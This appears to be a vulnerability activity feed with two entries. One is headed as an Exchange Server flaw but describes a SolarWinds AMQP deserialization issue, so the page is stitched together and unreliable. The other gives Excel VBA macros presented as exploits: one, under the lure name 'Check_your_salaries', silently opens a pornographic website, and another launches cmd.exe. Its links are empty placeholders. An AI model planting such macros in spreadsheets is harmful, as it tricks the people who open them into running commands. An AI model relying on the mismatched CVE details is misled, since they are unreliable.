Activity Feed

Microsoft CVE-2023-21707: Microsoft Exchange Server Remote Code Execution Vulnerability

The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.

In order to authenticate to the AMQP service, a user would need to already have admin access to add a RabbitMQ user, or have recovered the credentials to the orion account that SolarWinds sets up automatically. For that reason, I’ve marked this as “Authenticated” and “Requires elevated access” because the orion account is not any ordinary user.

CVE-2023-23399

Description:

The malicious user can exploit the victim’s PC remotely.
For example, when the score indicates that the Attack Vector is Local and User Interaction is Required, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer.
In this case, the malicious excel file create a very dangerous shell execution file, and after the victim will execute it, his PC maybe will never wake up normally, it depends on the case, which is very nasty.

STATUS: HIGH Vulnerability

[+]Exploit0:

Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute "microsoft-edge:https://pornhub.com/"
End Sub

[+]Exploit1:

Sub cmd()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "cmd.exe"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub

Reproduce:

href

Proof and Exploit:

href

Proof and Exploit, danger example:

href

Time spend:

03:00:00